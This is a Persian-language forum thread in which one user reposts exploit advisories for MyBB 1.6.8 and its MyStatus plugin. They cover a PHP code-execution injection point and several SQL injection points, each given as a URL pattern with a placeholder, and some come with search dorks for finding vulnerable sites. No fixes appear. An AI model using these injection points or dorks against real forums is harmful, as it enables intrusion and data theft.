ارسال پاسخ 
 
امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
باگ های MyBB 1.6.8
نویسنده پیام
mparsa آفلاین
او خواهد آمد...
*
کاربر سایت

ارسال‌ها: 62
تاریخ عضویت: فرو ۱۳۹۱
اعتبار: 5
سپاس ها : 147
 سپاس شده 21 بار در 14 ارسال
ارسال: #1
باگ های MyBB 1.6.8
با سلام و خسته نباشید خدمت همه ی دوستان .
قصد دارم در این تاپیک مجموعه باگ های نسخه 1.6.8 مای بی بی و روش فیکس آنها رو توضیح بدم (در صورت موجود بودن).

موفق باشید./

یا علی مدد


http://oshagholhosein.ir - انجمن عشاق الحسین
۲۲-۶-۱۳۹۱ ۰۲:۲۲ عصر
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
mparsa آفلاین
او خواهد آمد...
*
کاربر سایت

ارسال‌ها: 62
تاریخ عضویت: فرو ۱۳۹۱
اعتبار: 5
سپاس ها : 147
 سپاس شده 21 بار در 14 ارسال
ارسال: #2
RE: باگ های MyBB 1.6.8
باگ اول :

کد:
Mybb 1.6.8 PHP Code Execution Vulnerability 2012-08-31 21:03:40

################################################################################​??########
#
# Exploit Title : Mybb 1.6.8 PHP Code Execution Vulnerability
#
# Software Link : http://www.mybb.com/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : intext:"Powered By mybb 1.6.8"
#
################################################################################​??########
#
# Expl0iTs :
#
# http://target.com/forumdisplay.php?fid=&subforums=[PCE]
#
################################################################################​??########
#
#
################################################################################​??########

روشی جهت رفع باگ معرفی نشده است.

یا علی مدد


http://oshagholhosein.ir - انجمن عشاق الحسین
(آخرین ویرایش در این ارسال: ۲۲-۶-۱۳۹۱ ۰۲:۲۳ عصر، توسط mparsa.)
۲۲-۶-۱۳۹۱ ۰۲:۲۳ عصر
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
mparsa آفلاین
او خواهد آمد...
*
کاربر سایت

ارسال‌ها: 62
تاریخ عضویت: فرو ۱۳۹۱
اعتبار: 5
سپاس ها : 147
 سپاس شده 21 بار در 14 ارسال
ارسال: #3
RE: باگ های MyBB 1.6.8
باگ دوم :

کد:
Mybb 1.6.8 'announcements.php' Sql Injection Vulnerabilitiy 2012-06-21 16:46:26

################################################################################​#########
#
# Exploit Title : Mybb 1.6.8 'announcements.php' Sql Injection Vulnerabilitiy
#
#
# Software Link : http://www.mybb.com/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : "Powered By Mybb"
#
################################################################################​#########
#
# Expl0iTs :
#
# [TarGeT]/Patch/announcements.php?aid=1[Sql]
#
#

یا علی مدد


http://oshagholhosein.ir - انجمن عشاق الحسین
۲۲-۶-۱۳۹۱ ۰۲:۲۴ عصر
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
mparsa آفلاین
او خواهد آمد...
*
کاربر سایت

ارسال‌ها: 62
تاریخ عضویت: فرو ۱۳۹۱
اعتبار: 5
سپاس ها : 147
 سپاس شده 21 بار در 14 ارسال
ارسال: #4
RE: باگ های MyBB 1.6.8
باگ بعدی:

کد:
Mybb 1.6.8 Sql Injection Vulnerabilitiy 2012-06-07 12:53:35

################################################################################​########
#
# Exploit Title : Mybb 1.6.8 Sql Injection Vulnerabilitiy
#
# Software Link : http://www.mybb.com/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : "Powered By Mybb"
#
################################################################################​########
#
# Expl0iTs :
#
# [TarGeT]/Patch/member.php?action=warning_level&customfield=[Sql]
#
#

یا علی مدد


http://oshagholhosein.ir - انجمن عشاق الحسین
۲۲-۶-۱۳۹۱ ۰۲:۲۵ عصر
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
mparsa آفلاین
او خواهد آمد...
*
کاربر سایت

ارسال‌ها: 62
تاریخ عضویت: فرو ۱۳۹۱
اعتبار: 5
سپاس ها : 147
 سپاس شده 21 بار در 14 ارسال
ارسال: #5
RE: باگ های MyBB 1.6.8
باگ پلاگین MyBB MyStatus 3.1

MyBB MyStatus 3.1 SQL Injection Vulnerability
کد:
Exploit Title : MyBB MyStatus 3.1
---------------------------------------------------------------------

Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------

Description >

Vendor : http://mods.mybb.com/download/mystatus
Tested On : Windows 7
---------------------------------------------------------------------

SQL Injection

http://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]
---------------------------------------------------------------------

---------------------------------------------------------------------

Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2

All users: HackinQ.pl

یا علی مدد


http://oshagholhosein.ir - انجمن عشاق الحسین
۲۲-۶-۱۳۹۱ ۰۲:۲۸ عصر
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
ارسال پاسخ 


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

خانه | بازگشت به بالا | بازگشت به محتوا | نسخه موبایل | پیوند سایتی RSS
اخبار فناوری اطلاعات | نرم افزار املاک | هتل آپارتمان مشهد | نرم افزار رستوران | نرم افزار تاکسی سرویس | نرم افزار رستوران | دانلود نرم افزار مطب | دانلود نرم افزار تاکسی سرویس | مجله پزشکی آسان طب | اتوماسیون پزشکی | نرم افزار دفترچه تلفن نرم افزار چاپ چک نرم افزار رستوران نرم افزار فست فود نرم افزار کافی شاپ نرم افزار تاکسی سرویس نرم افزار نمایشگاه خودرو نرم افزار املاک نرم افزار هتلداری نرم افزار مطب نرم افزار دندانپزشکی نرم افزار انبارداری نرم افزار حسابداری فروشگاه نرم افزار وکالت مجله اینترنتی پارسی وان | مجله اینترنتی زیگیل | خرید بک لینک | خرید رپورتاژ | سینما تئاتر مای استیج | یک مهاجر | دنیای مهاجرت | مجله گردشگری کاروان | وردپرس دانلود | مجله تفریحی تندیس فان | نرم افزار Software | جوک جدید | اخبار هنر | اخبار کامپیوتر | سایت پزشکی | فروشگاه اینترنتی | سایت خبری | دانلود موزیک | اندروید سه | بانک شماره موبایل | پایگاه صالحین | مجله کامپیوتری | جاب لر | نوین ساخت | سهام نت | تکی کو | تم کد | مجله اینترنتی وبدون | پورتال خبری | سایت تفریحی تک لایو | مجله سرگرمی سیب رنک | سایت پزشکی دکتر طب | مدرن بوک | مجله اینترنتی فرتکست | مجله پزشکی نت سلامت | کافه ایرونی | مجله خندانک | مجله اینترنتی فان استار | مجله من | مجله اینترنتی دونیمه | مجله اینترنتی بردیا | فاینال مد | فرهنگیا | نامبروان | جان نو | مگفر | مجله 24 | نیمچه | تک پدیا | آیناز وب | مطالب بیست | میهن اسکای | نیک آنلاین | شینار | وطنی ها | طب جدید | هوای تازه | آاقای گل | برترین مطالب | دایی رضا | فارس پدیا | آجودانیه | چارشنبه | فانیفا | قارپوز | گوهرمند | گل بهار | جهان من | جوان امروز | کالچر | مه آذین | مجله سبز | مگناب | دنیای نت | نیک اندیشه | نیکاندوست | نیک پاتوق | ازبک | پارمینو | پیک آبی | پورتال من | راز آلود | روسپید | رشد نگر | رویای زندگی | شورانگیز | سیمای وب | نتیها | تاپکده | وب دوستان | ویکی وان | یکناز | زرچوب | زردقناری | عصرطلایی | فرتورز | آموزش گیتار | مایادانلود | | دکتر CMS | سایت آموزش گیتار | رایان درمان | پارسیان گشت | ایران کافه | گیتی بوک | مجله فراتوریسم | فراتوریسم | دکتر آسان دنت | آسان دنت | مجله گردشگری افراگشت | افراگشت | هشت گام | فرکافی | میهن تاج | مجله پزشکی رایان درمان | موج سینما | تیزباد | برفانک | کافه داران | کینگ دانلود |